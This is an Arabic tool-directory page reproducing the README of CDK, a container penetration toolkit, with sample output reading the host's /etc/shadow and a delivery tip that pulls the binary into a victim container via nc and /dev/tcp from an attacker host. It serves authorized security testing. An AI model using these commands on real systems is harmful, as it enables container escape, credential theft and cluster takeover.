Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CDK — 📦 جعل اختبار الأمان لـ K8s و Docker و Containerd أسهل. | Kitploit
أدوات/GitHubGitHub/cdk-team/cdk
تصعيد الامتيازاتالاستطلاعأمن الحاوياتآليات الاستمراريةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقأمن السحابةالهروب من الحاويةالأفضل في الهروب من الحاوية #2
4.7k60665منذ 5 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubcdk-team/cdk

CDK

📦 جعل اختبار الأمان لـ K8s و Docker و Containerd أسهل.

عرض المستودعالموقع الإلكتروني

CDK - مجموعة أدوات اختراق الحاويات بدون تبعيات

الإنجليزية | 简体中文

png

إخلاء مسؤولية قانوني

استخدام CDK لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. CDK مخصص لأغراض اختبار الأمان فقط.

نظرة عامة

CDK هي مجموعة أدوات مفتوحة المصدر لاختراق الحاويات، مصممة لتوفير استغلال مستقر في حاويات مختلفة مبسطة دون أي اعتماد على نظام التشغيل. تأتي مع أدوات شبكة مفيدة والعديد من البراهين/الاستغلالات القوية وتساعدك على الهروب من الحاوية والسيطرة على مجموعة K8s بسهولة.

بداية سريعة

شغّل cdk eva للحصول على معلومات التقييم واستغلال موصى به، ثم شغّل cdk run لبدء الهجوم.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

التثبيت/التسليم

قم بتنزيل أحدث إصدار من https://github.com/cdk-team/CDK/releases/

ضع الملفات التنفيذية في الحاوية الهدف وابدأ الاختبار.

نصائح: تسليم CDK إلى الحاوية الهدف في اختبار الاختراق الفعلي

إذا كان لديك استغلال يمكنه تحميل ملف، فيمكنك تحميل ملف CDK الثنائي مباشرة.

إذا كان لديك استغلال RCE، ولكن الحاوية الهدف لا تحتوي على curl أو wget، فيمكنك استخدام الطريقة التالية لتسليم CDK:

  1. أولاً، استضف ملف CDK الثنائي على مضيفك بعنوان IP عام.
(على مضيفك)
nc -lvp 999 < cdk
  1. داخل الحاوية الضحية، قم بتنفيذ
cat < /dev/tcp/(عنوان_ip_العام_لمضيفك)/(المنفذ) > cdk
chmod a+x cdk

الاستخدام

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

الميزات

يحتوي CDK على ثلاث وحدات:

  1. التقييم: جمع المعلومات داخل الحاوية للعثور على نقاط الضعف المحتملة.
  2. الاستغلال: هروب الحاوية، الثبات والحركة الجانبية.
  3. الأداة: أدوات الشبكة وواجهات برمجة التطبيقات لطلبات TCP/HTTP والأنفاق وإدارة مجموعة K8s.

وحدة التقييم

الاستخدام

cdk evaluate [--full]
التكتيكاتالنصمدعومالاستخدام/مثال
جمع المعلوماتمعلومات نظام التشغيل الأساسية✔link
جمع المعلوماتالإمكانيات المتاحة✔link
جمع المعلوماتأوامر لينكس المتاحة✔link
جمع المعلوماتالتركيبات✔link
جمع المعلوماتمساحة اسم الشبكة✔link
جمع المعلوماتالمتغيرات البيئية الحساسة✔link
جمع المعلوماتالعمليات الحساسة✔link
جمع المعلوماتالملفات المحلية الحساسة✔link
جمع المعلوماتتوجيه Kube-proxy للشبكة المحلية (CVE-2020-8558)✔link
جمع المعلوماتاكتشاف الخدمة المستند إلى DNS✔link
الاكتشافمعلومات خادم K8s Api✔link
الاكتشافمعلومات حساب خدمة K8s✔link
الاكتشافواجهة برمجة تطبيقات بيانات تعريف مزود السحابة✔link

وحدة الاستغلال

قائمة بجميع الاستغلالات المتاحة:

cdk run --list

تشغيل استغلال مستهدف:

cdk run <اسم-النص> [خيارات]
تنزيل الأداة